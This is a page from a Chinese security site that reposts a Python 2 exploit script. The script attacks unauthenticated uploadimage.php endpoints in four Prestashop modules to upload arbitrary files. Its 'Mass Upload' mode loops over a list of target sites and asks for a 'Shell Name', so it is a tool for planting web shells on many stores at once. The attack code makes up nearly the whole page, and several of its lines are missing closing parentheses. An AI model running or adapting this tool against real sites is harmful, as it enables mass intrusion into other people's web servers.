首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Prestashop Multi Modules Arbitrary File Upload Exploit
来源:pentesterdesk@gmail.com 作者:PentesterDesk 发布时间:2016-08-29  
#!/usr/bin/python
####################################################################################
#Author  : PentesterDesk
#Date    : 20-June-2016
#Software: Prestashop CMS
#vuln Mod: Simpleslideshow , productpageadverts , Homepageadvertise , columnadverts
####################################################################################
import sys, os
import time
import requests
def main():
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
  
        banner = '''
  
                        +======================================================+
                        |    Prestashop  |  FileUpload Exp   |  PentesterDesk  |
                        |         Found by : Muhammad Faisal Gunanda           |
                        |         Coded by : PentesterDesk Team                |
                        |         Contact  : pentesterdesk@gmail.com           |
                        +======================================================+
                        '''
        print banner
        print "[1] SimpleSlideShow "
        print "[2] Productpageadverts"
        print "[3] HomepageAdvertise"
        print "[4] columnAdverts"
        ch1=raw_input("\n[>] ")
#1 SimpleSlideShow
        if ch1 == '1':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
                print "\n                       <==============SimpleSlideShow Exploit=================>\n"
                print "[1] Single Site "
                print "[2] Mass Upload"
                print "[3] GoTo Home"
                ch2=raw_input("\n[>] ")
                if ch2 == '3':
                        main()
                if ch2 == '1':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <==============SimpleSlideShow Exploit=================>\n"
                        url = raw_input("[+] Enter Url  : ")
                        filname= raw_input("[+] Enter File : ")
                        if filname == '' or url == '':
                                print "\n[!] Url or File is not entered\n"
                                raw_input("[+] Enter Any key to try agian [>] ")
                                main()
                        #url Logic
                        if '/modules/simpleslideshow/' in url:
                                url=url.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
                        elif '/modules/simpleslideshow/uploadimage.php' in url:
                                url=url
                        else:
                                url = url + "/modules/simpleslideshow/uploadimage.php"
                        #main
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        if req.status_code == 200 or 'success' in req.text:
                                url=url.replace('/uploadimage.php','/slides/'+filname)
                                print ("[+] %s [ok]" % (url))
                        else:
                                print "\n[+] %s \n" %url
                        raw_input("\n[+] Press Enter [>] ")
                        main()
                #Mass upload Logic
                if ch2 == '2':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <==============SimpleSlideShow Exploit=================>\n"
                        filee = raw_input("[+] Enter List  Name : ")
                        filname= raw_input("[+] Enter Shell Name : ")
                        if filname == '' or filee == '':
                                        print "\n[!] Url or File is not entered\n"
                                        raw_input("[+] Enter Any key to try agian [>] ")
                                        main()
                        ob = open(filee,'r')
                        lists = ob.readlines()
                        list1 = []
                        i = 0
                        for i in range(len(lists)):
                                list1.append(lists[i].strip('\n'))
                                  
                        count = 0
                        for site in (list1):
                                count = count + 1
                                if '/modules/simpleslideshow/' in site:
                                        url=site.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
                                elif '/modules/simpleslideshow/uploadimage.php' in site:
                                        url=site
                                else:
                                        url = site + "/modules/simpleslideshow/uploadimage.php"
                                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                                req=requests.post(url,files=files)
                                if req.status_code == 200 or 'success' in req.text:
                                        url=url.replace('/uploadimage.php','/slides/'+filname)
                                        print ("[%d] %s [ ok ]" % (count,url))
                                else:
                                        print ("[%d]  %s " % (count,url))
                raw_input("\n[+] Press Enter [>] ")
                main()
                                  
#2 productpageadverts
        if ch1 == '2':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
                print "\n                       <==============Productpageadverts Exploit==============>\n"
                print "[1] Single Site "
                print "[2] Mass Upload"
                print "[3] GoTo Home"
                ch2=raw_input("\n[>] ")
                if ch2 == '3':
                        main()
                if ch2 == '1':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <==============Productpageadverts Exploit==============>\n"
                        url = raw_input("[+] Enter Url  : ")
                        filname= raw_input("[+] Enter File : ")
                        if filname == '' or url == '':
                                print "\n[!] Url or File is not entered\n"
                                raw_input("[+] Enter Any key to try agian [>] ")
                                main()
                        #url Logic
                        if '/modules/productpageadverts/' in url:
                                url=url.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
                        elif '/modules/productpageadverts/uploadimage.php' in url:
                                url=url
                        else:
                                url = url + "/modules/productpageadverts/uploadimage.php"
                        #main
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        if req.status_code == 200 or 'success' in req.text:
                                url=url.replace('/uploadimage.php','/slides/'+filname)
                                print ("[+] %s [ ok ]" % (url))
                        else:
                                print "\n\[+] %s \n" %url
                        raw_input("\n[+] Press Enter [>] ")
                        main()
                #Mass upload Logic
                if ch2 == '2':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <==============Productpageadverts Exploit==============>\n"
                        filee = raw_input("\033[1;36m[+] Enter List  Name : \033[1;m")
                        filname= raw_input("\033[1;36m[+] Enter Shell Name : \033[1;m")
                        if filname == '' or filee == '':
                                        print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
                                        raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
                                        main()
                        ob = open(filee,'r')
                        lists = ob.readlines()
                        list1 = []
                        i = 0
                        for i in range(len(lists)):
                                list1.append(lists[i].strip('\n'))
                                  
                        count = 0
                        for site in (list1):
                                count = count + 1
                                if '/modules/productpageadverts/' in site:
                                        url=site.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
                                elif '/modules/simpleslideshow/uploadimage.php' in site:
                                        url=site
                                else:
                                        url = site + "/modules/productpageadverts/uploadimage.php"
                                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                                req=requests.post(url,files=files)
                                if req.status_code == 200 or 'success' in req.text:
                                        url=url.replace('/uploadimage.php','/slides/'+filname)
                                        print ("[%d] %s [ ok ]" % (count,url))
                                else:
                                        print ("[%d]  %s " % (count,url))
                raw_input("\n[+] Press Enter [>] ")
                main()
#3 homepageadvertise
        if ch1 == '3':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
                print "\n                       <==============HomePageAdvertise Exploit===============>\n"
                print "[1] Single Site "
                print "[2] Mass Upload"
                print "[3] GoTo Home"
                ch2=raw_input("\n[>] ")
                if ch2 == '3':
                        main()
                if ch2 == '1':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <==============HomePageAdvertise Exploit===============>\n"
                        url = raw_input("[+] Enter Url  : ")
                        filname= raw_input("[+] Enter File : ")
                        if filname == '' or url == '':
                                print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
                                raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
                                main()
                        #url Logic
                        if '/modules/homepageadvertise/' in url:
                                url=url.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
                        elif '/modules/homepageadvertise/uploadimage.php' in url:
                                url=url
                        else:
                                url = url + "/modules/homepageadvertise/uploadimage.php"
                        #main
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        if req.status_code == 200 or 'success' in req.text:
                                url=url.replace('/uploadimage.php','/slides/'+filname)
                                print ("[+] %s [ ok ]" % (url))
                        else:
                                print "\n[+] %s \n" %url
                        raw_input("\n[+] Press Enter [>] ")
                        main()
                #Mass upload Logic
                if ch2 == '2':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <==============HomePageAdvertise Exploit===============>\n"
                        filee = raw_input("[+] Enter List  Name : ")
                        filname= raw_input("[+] Enter Shell Name : ")
                        if filname == '' or filee == '':
                                        print "\n\[!] Url or File is not entered\n"
                                        raw_input("[+] Enter Any key to try agian [>] ")
                                        main()
                        ob = open(filee,'r')
                        lists = ob.readlines()
                        list1 = []
                        i = 0
                        for i in range(len(lists)):
                                list1.append(lists[i].strip('\n'))
                                  
                        count = 0
                        for site in (list1):
                                count = count + 1
                                if '/modules/homepageadvertise/' in site:
                                        url=site.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
                                elif '/modules/homepageadvertise/uploadimage.php' in site:
                                        url=site
                                else:
                                        url = site + "/modules/homepageadvertise/uploadimage.php"
                                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                                req=requests.post(url,files=files)
                                if req.status_code == 200 or 'success' in req.text:
                                        url=url.replace('/uploadimage.php','/slides/'+filname)
                                        print ("[%d]] %s [ ok ]" % (count,url))
                                else:
                                        print ("[%d]  %s " % (count,url))
                raw_input("\n[+] Press Enter [>] ")
                main()
#4 columnadverts
        if ch1 == '4':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
                print "\n                       <================ColumnAdvers Exploit==================>\n"
                print "[1] Single Site "
                print "[2] Mass Upload"
                print "[3] GoTo Home"
                ch2=raw_input("\n[>] ")
                if ch2 == '3':
                        main()
                if ch2 == '1':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <================ColumnAdvers Exploit==================>\n"
                        url = raw_input("[+] Enter Url  : ")
                        filname= raw_input("[+] Enter File : ")
                        if filname == '' or url == '':
                                print "\n[!] Url or File is not entered\n"
                                raw_input("[+] Enter Any key to try agian [>] ")
                                main()
                        #url Logic
                        if '/modules/columnadverts/' in url:
                                url=url.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
                        elif '/modules/columnadverts/uploadimage.php' in url:
                                url=url
                        else:
                                url = url + "/modules/columnadverts/uploadimage.php"
                        #main
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        if req.status_code == 200 or 'success' in req.text:
                                url=url.replace('/uploadimage.php','/slides/'+filname)
                                print ("[+] %s [ ok ]" % (url))
                        else:
                                print "\n[+] %s \n" %url
                        raw_input("\n[+] Press Enter [>] ")
                        main()
                #Mass upload Logic
                if ch2 == '2':
                        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                        print banner
                        print "\n                       <================ColumnAdvers Exploit==================>\n"
                        filee = raw_input("[+] Enter List  Name : ")
                        filname= raw_input("[+] Enter Shell Name : ")
                        if filname == '' or filee == '':
                                        print "\n[!] Url or File is not entered\n"
                                        raw_input("[+] Enter Any key to try agian [>] ")
                                        main()
                        ob = open(filee,'r')
                        lists = ob.readlines()
                        list1 = []
                        i = 0
                        for i in range(len(lists)):
                                list1.append(lists[i].strip('\n'))
                                  
                        count = 0
                        for site in (list1):
                                count = count + 1
                                if '/modules/columnadverts/' in site:
                                        url=site.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
                                elif '/modules/columnadverts/uploadimage.php' in site:
                                        url=site
                                else:
                                        url = site + "/modules/columnadverts/uploadimage.php"
                                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                                req=requests.post(url,files=files)
                                if req.status_code == 200 or 'success' in req.text:
                                        url=url.replace('/uploadimage.php','/slides/'+filname)
                                        print ("[%d] %s [ ok ]" % (count,url))
                                else:
                                        print ("[%d] %s " % (count,url))
                raw_input("\n[+] Press Enter [>] ")
                main()
if __name__ == "__main__":
    main()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Phoenix Exploit Kit Remote Cod
·NECROSOFT NScan 0.9.1 Buffer O
·OpenSSHD 7.2p2 - User Enumerat
·Prestashop Attributewizardpro
·WordPress 4.5.3 - Directory Tr
·Prestashop VtermSlideShow Modu
·VideoIQ Camera - Local File Di
·INTELLINET IP Camera INT-L100M
·MESSOA IP Cameras (Multiple Mo
·NScan 0.9.1 - (Target) Buffer
·ZYCOO IP Phone System - Remote
·Goron Webserver 2.0 - Multiple
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved